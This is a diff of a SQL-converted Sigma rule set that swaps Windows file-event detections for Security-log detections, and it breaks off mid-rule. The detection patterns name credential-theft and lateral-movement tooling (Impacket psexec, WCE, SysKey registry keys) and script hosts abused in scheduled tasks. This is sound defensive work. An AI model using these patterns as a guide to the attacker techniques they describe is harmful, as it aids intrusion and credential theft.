+ "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", + "author": "frack113", "falsepositives": [ - "Legitimate macro files downloaded from the internet", - "Legitimate macro files sent as attachemnts via emails" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\HxOutlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') AND ((TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\') OR (TargetFilename LIKE '%.docm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dotm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xltm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.potm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.pptm:Zone%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" ], - "filename": "file_event_win_office_macro_files_downloaded.yml" + "filename": "win_security_replay_attack_detected.yml" }, { - "title": "Suspicious File Event With Teams Objects", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "title": "SysKey Registry Keys Access", + "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "status": "test", + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" ], - "filename": "file_event_win_access_susp_teams.yml" + "filename": "win_security_syskey_registry_access.yml" }, { - "title": "Office Macro File Creation From Suspicious Process", - "id": "b1c50487-1967-4315-a026-6491686d860e", + "title": "User with Privileges Logon", + "id": "94309181-d345-4cbf-b5fe-061769bdf9cb", "status": "experimental", - "description": "Detects the creation of a office macro file from a a suspicious process", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], + "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", + "author": "frack113", "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4672', '4964') AND NOT (SubjectUserSid = 'S-1-5-18'))" ], - "filename": "file_event_win_office_macro_files_from_susp_process.yml" + "filename": "win_security_admin_logon.yml" }, { - "title": "Suspicious Get-Variable.exe Creation", - "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", - "status": "experimental", - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", - "author": "frack113", + "title": "Impacket PsExec Execution", + "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "status": "test", + "description": "Detects execution of Impacket's psexec.py.", + "author": "Bhabesh Raj", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_get_variable.yml" + "filename": "win_security_impacket_psexec.yml" }, { - "title": "Files With System Process Name In Unsuspected Locations", - "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", "status": "test", - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.credential_access", + "attack.t1003", + "attack.s0005" ], "falsepositives": [ - "System processes copied outside their default folders for testing purposes", - "Third party software naming their software with the same names as the processes mentioned here" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" ], - "filename": "file_event_win_creation_system_file.yml" + "filename": "win_security_mal_wceaux_dll.yml" }, { - "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", - "id": "07a99744-56ac-40d2-97b7-2095967b0e03", - "status": "experimental", - "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", + "title": "Hidden Local User Creation", + "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "status": "test", + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.privilege_escalation" + "attack.t1136.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" ], - "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" + "filename": "win_security_hidden_user_creation.yml" }, { - "title": "TeamViewer Remote Session", - "id": "162ab1e4-6874-4564-853c-53ec3ab8be01", - "status": "test", - "description": "Detects the creation of log files during a TeamViewer remote session", + "title": "Account Tampering - Suspicious Failed Logon Reasons", + "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "status": "experimental", + "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access", + "attack.t1078" ], "falsepositives": [ - "Legitimate uses of TeamViewer in an organisation" + "User using a disabled account" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\TeamViewer\\\\RemotePrinting\\\\tvprint.db' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TeamViewer\\\\TVNetwork.log' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\TeamViewer%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Logfile.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4625', '4776') AND Status IN ('0xC0000072', '0xC000006F', '0xC0000070', '0xC0000413', '0xC000018C', '0xC000015B')) AND NOT (SubjectUserSid = 'S-1-0-0'))" ], - "filename": "file_event_win_susp_teamviewer_remote_session.yml" + "filename": "win_security_susp_failed_logon_reasons.yml" }, { - "title": "Creation Of Non-Existent System DLL", - "id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", + "title": "Suspicious Scheduled Task Creation", + "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "status": "experimental", - "description": "Detects the creation of system dlls that are not present on the system. Usually to achieve dll hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", + "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", + "attack.execution", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') OR TargetFilename LIKE '%\\\\SprintCSP.dll' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_create_non_existent_dlls.yml" + "filename": "win_security_susp_scheduled_task_creation.yml" }, { - "title": "Creation of an WerFault.exe in Unusual Folder", - "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", - "status": "experimental", - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" - ], + "title": "Locked Workstation", + "id": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", + "status": "stable", + "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", + "author": "Alexandr Yampolskyi, SOC Prime", "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4800')" ], - "filename": "file_event_win_werfault_dll_hijacking.yml" + "filename": "win_security_workstation_was_locked.yml" }, { - "title": "Potential RipZip Attack on Startup Folder", - "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", - "status": "experimental", - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", - "author": "Greg (rule)", + "title": "Operation Wocao Activity - Security", + "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "status": "test", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" ], - "filename": "file_event_win_ripzip_attack.yml" + "filename": "win_security_apt_wocao.yml" }, { - "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", - "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", - "status": "experimental", - "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE", + "title": "Failed Code Integrity Checks", + "id": "470ec5fa-7b4e-4071-b200-4c753100f49b", + "status": "stable", + "description": "Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027.001" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Disk device errors" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('5038', '6281'))" ], - "filename": "file_event_win_powershell_startup_shortcuts.yml" + "filename": "win_security_susp_codeintegrity_check_failure.yml" }, { - "title": "ISO File Created Within Temp Folders", - "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "status": "experimental", - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "author": "@sam0x90", + "title": "Admin User Remote Logon", + "id": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", + "status": "test", + "description": "Detect remote login by Administrator user (depending on internal pattern).", + "author": "juju4", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.lateral_movement", + "attack.t1078.001", + "attack.t1078.002", + "attack.t1078.003", + "car.2016-04-005" ], "falsepositives": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + "Legitimate administrative activity." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND AuthenticationPackageName = 'Negotiate' AND TargetUserName LIKE 'Admin%' ESCAPE '\\')" ], - "filename": "file_event_win_iso_file_mount.yml" + "filename": "win_security_admin_rdp_login.yml" }, { - "title": "Suspicious MSExchangeMailboxReplication ASPX Write", - "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", + "title": "Suspicious Computer Account Name Change CVE-2021-42287", + "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", "status": "test", - "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' 